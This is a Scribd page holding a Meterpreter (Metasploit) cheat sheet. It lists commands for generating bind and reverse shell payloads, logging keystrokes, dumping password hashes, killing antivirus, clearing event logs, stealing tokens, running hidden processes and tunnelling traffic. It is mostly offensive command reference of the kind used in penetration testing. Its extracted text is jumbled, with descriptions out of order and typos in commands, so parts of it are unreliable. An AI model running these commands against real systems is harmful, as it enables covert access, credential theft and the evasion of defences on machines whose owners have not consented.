0% found this document useful (0 votes)
346 views2 pages

Meterpreter Cheat Sheet: Executing Meterpreter User Interface Commands

This document provides a cheat sheet for using Meterpreter, an exploit payload used in Metasploit. It describes how to execute Meterpreter as an exploit payload or standalone binary, and lists key user interface, core, file system, system, networking, and registry commands. Examples include getting the current working directory, listing processes, uploading and downloading files, and establishing port forwarding tunnels.

Uploaded by

onubey
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
346 views2 pages

Meterpreter Cheat Sheet: Executing Meterpreter User Interface Commands

This document provides a cheat sheet for using Meterpreter, an exploit payload used in Metasploit. It describes how to execute Meterpreter as an exploit payload or standalone binary, and lists key user interface, core, file system, system, networking, and registry commands. Examples include getting the current working directory, listing processes, uploading and downloading files, and establishing port forwarding tunnels.

Uploaded by

onubey
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 2

Meterpreter Cheat Sheet

version: 0.1
Executing Meterpreter
As a Metasploit Exploit Payload (bind_tcp) for bind shell or (reverse_tcp) for reverse shell As Standalone binary to be uploaded and executed on the target system:

User Interface Commands


meterpreter> idletime
Displays how much time the user is inactive

meterpreter> keyscan_start ./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > meterpreter.exe (Bind Shell) ./msfcli exploit/multi/handler PAYLOAD=windows/meterpeter/bind_tcp LPORT=443 RHOST=<IP> ./msfpayload wndows/meterpreter/reverse_tcp RHOST=<IP> RPORT=443 X > meterpreter.exe (Reverse Shell) ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=443 E Starts recording user key typing meterpreter>keyscan_dump
Dumps the users key strokes

meterpreter> keyscan_stop
Stops recording user typing

Core Commands
meterpreter> background
Puts the Meterpreter session in background mode. Session could be recovered typing:
sessions l ( to identify session ID) espia Allows Desktop spying through screenshots Allows user impersonation sort of commands Allows filesystem and hash dumping commands Allows network sniffing interaction commands sessions i <Session ID>

meterpreter> use <library>


Permits loading extra meterpreter functionalities with the following loadable libraries:

meterpreter> run <script>


Permits the execution of ruby selfdeveloped meterpreter scripts such:
checkvm credcollect get_local_subnets getcountermeasure getgui gettelnet hashdump keylogrecorder killav metsvc migrate netenum prefetchtool vnc_oneport / vnc sheduleme winenum

meterpreter> irb
Opens meterpreter scripting menu

incognito

priv

sniffer

File System Commands


meterpreter> getwd
Obtain current working directory on Servers Side

System Commands
meterpreter> sysinfo Provides information about target host meterpreter> getuid Obtain the username responsible for the current process meterpreter> kill <pid> meterpreter> edit <file> Edit the given file Kill the given process identified by PID meterpreter> ps meterpreter> execute f file [Options]
Execute the given file on the OS target host. Options:

meterpreter> getlwd
Obtain local current working directory

-H Create the process hidden from view


-a -i Arguments to pass to the command Interact with the process after creating it

meterpreter> del <file>

Deletes the given file


meterpreter> cat <file> Read the given file

-m Execute from memmory -t Execute process with currently impersonated thread token

meterpreter> clearav
Clears and secure removes event logs

meterpreter> upload <src file> <dst file> Upload a file to the target host

List all running processes


meterpreter> shell Obtain interactive windows OS Shell

meterpreter> steal_token
Attemps to steal an impersonation token from the target process

meterpreter> download <src file> <dst file>


Download a file from the target host

Networking Commands
meterpreter> portfwd Establish port forwarding meterpreter tunnels: Options: -L -l -p -r Local host to listen on Local port to listen on Remote port to connect to Remote host to connect to connections through

meterpreter> reg <Command> [Options]


Interact with the target OS Windows Registry using the following options and commands: commands:

Options:
-d Data to store in the registry value -k The registry key -v The registry value name

enumkey

Enumerate the supplied registry key

createkey / deletekey Create/deleted the supplied registry key setval / queryval Set/query values from the supplied registry key

meterpreter> ipconfig
Displays network interfaces information

meterpreter> route View and modify networking routing table

You might also like